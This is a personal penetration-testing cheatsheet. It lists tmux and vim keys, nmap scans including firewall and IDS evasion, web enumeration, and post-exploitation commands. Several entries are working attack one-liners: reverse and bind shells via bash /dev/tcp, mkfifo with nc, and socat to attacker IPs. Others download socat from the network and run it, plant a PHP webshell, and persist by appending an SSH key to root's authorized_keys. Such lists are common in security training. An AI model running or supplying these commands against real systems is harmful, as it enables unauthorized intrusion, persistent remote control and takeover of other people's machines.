My cheatsheet for pentest
| Command |
Description |
tmux |
Start tmux |
ctrl+b |
default prefix |
prefix c |
new window |
prefix 1 |
switch to window (1) |
prefix shift+% |
split pane vertically |
prefix shift+" |
split pane horizontally |
prefix -> |
switch to the right pane |
| Command |
Description |
vim file |
open file with vim |
esc+i |
enter insert mode |
esc |
back to normal mode |
x |
Cut character |
dw |
Cut word |
dd |
Cut full line |
yw |
Copy word |
yy |
Copy full line |
p |
Paste |
:1 |
Go to line number 1. |
:w |
Write the file 'i.e. save' |
:q |
Quit |
:q! |
Quit without saving |
| `:wq`` |
Write and quit |
Pentesting
Command Description
| Command |
Description |
nmap 10.129.42.253 |
Run nmap on an IP |
nmap -sV -sC -p- 10.129.42.253 |
Run an nmap script scan on an IP |
locate scripts/citrix |
List various available nmap scripts |
nmap --script smb-os-discovery.nse -p445 10.10.10.40 |
Run an nmap script on an IP |
netcat 10.10.10.10 22 |
Grab banner of an open port |
smbclient -N -L \\\\10.129.42.253 |
List SMB Shares |
smbclient \\\\10.129.42.253\\users |
Connect to an SMB share |
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 |
Scan SNMP on an IP |
onesixtyone -c dict.txt 10.129.42.254 |
Brute force SNMP secret string |
Nmap command to bypass firewalls rules and IDS/IP
| Command |
Description |
sudo nmap 10.129.2.28 -Pn -n -O -S 10.129.2.200 -e tun0 |
Scan by Using Different Source IP |
sudo nmap 10.129.2.28 -sA -Pn -n --disable-arp-ping --packet-trace |
TCP ACK scan (-sA) method |
sudo nmap 10.129.2.28 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:53 |
Scan by Using Decoys |
sudo nmap 10.129.2.28 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 |
SYN-Scan From DNS Port |
ncat -nv --source-port 53 10.129.2.28 50000 |
Connect To The Filtered Port From DNS Port |
nc -p 53 10.129.188.48 50000 |
Connect To The Filtered Port From DNS Port |
| Command |
Description |
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt |
Run a directory scan on a website |
dirsearch -u http://192.168.142.101 |
Run a directory scan on a website |
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt |
Run a sub-domain scan on a website |
curl -IL https://www.inlanefreight.com |
Grab website banner |
whatweb 10.10.10.121 |
List details about the webserver/certificates |
curl 10.10.10.121/robots.txt |
List potential directories in robots.txt |
ctrl+U |
View page source (in Firefox) |
| Command |
Description |
searchsploit openssh 7.2 |
Search for public exploits for a web application |
| Command |
Description |
nc -lvnp 1234 |
Start a nc listener on a local port |
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' |
Send a reverse shell from the remote server |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f |
Another command to send a reverse shell from the remote server |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f |
Start a bind shell on the remote server |
nc 10.10.10.1 1234 |
Connect to a bind shell started on the remote server |
python -c 'import pty; pty.spawn("/bin/bash")' |
Upgrade shell TTY (1) |
ctrl+z then stty raw -echo then fg then enter twice |
Upgrade shell TTY (2) |
socat file:`tty`,raw,echo=0 tcp-listen:4444 |
Upgrade shell TTY using socat (listener) |
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
Upgrade shell TTY using socat (victim) |
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
Oneliner download socat and Upgrade shell TTY using socat |
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php |
Create a webshell php file |
curl http://SERVER_IP:PORT/shell.php?cmd=id |
Execute a command on an uploaded webshell |
| Command |
Description |
./linpeas.sh |
Run linpeas script to enumerate remote server |
sudo -l |
List available sudo privileges |
sudo -u user /bin/echo Hello World! |
Run a command with sudo |
sudo su - |
Switch to root user (if we have access to sudo su) |
sudo su user - |
Switch to a user (if we have access to sudo su) |
ssh-keygen -f |
key Create a new SSH key |
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys |
Add the generated public key to the user |
ssh root@10.10.10.10 -i key |
SSH to the server with the generated private key |
| Command |
Description |
python3 -m http.server 8000 |
Start a local webserver |
wget http://10.10.14.1:8000/linpeas.sh |
Download a file on the remote server from our local machine |
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh |
Download a file on the remote server from our local machine |
scp linenum.sh user@remotehost:/tmp/linenum.sh |
Transfer a file to the remote server with scp (requires SSH access) |
iwr -uri http://192.168.45.227:8000/nc.exe -O nc.exe |
Download a file on the remote server from our local machine using PowerShell |
base64 shell -w 0 |
Convert a file to base64 |
echo f0VMR...SNIO...InmDwU | base64 -d > shell |
Convert a file from base64 back to its original |
md5sum shell |
Check the file's md5sum to ensure it converted correctly |
| Command |
Description |
curl -s http://xx.xx.xx.xx/content/private/users.xml | xmllint --format - |
Beautify XML |
xsltproc target.xml -o target.html |
Convert XML to HTML |
Living off the land (LOTL)
| URL |
Description |
https://gtfobins.github.io/ |
Unix binaries |
https://lolbas-project.github.io/ |
Windows binaries, Scripts and Libraries |
https://www.loldrivers.io/ |
Windows drivers |
https://www.loobins.io/ |
macOS Binaries |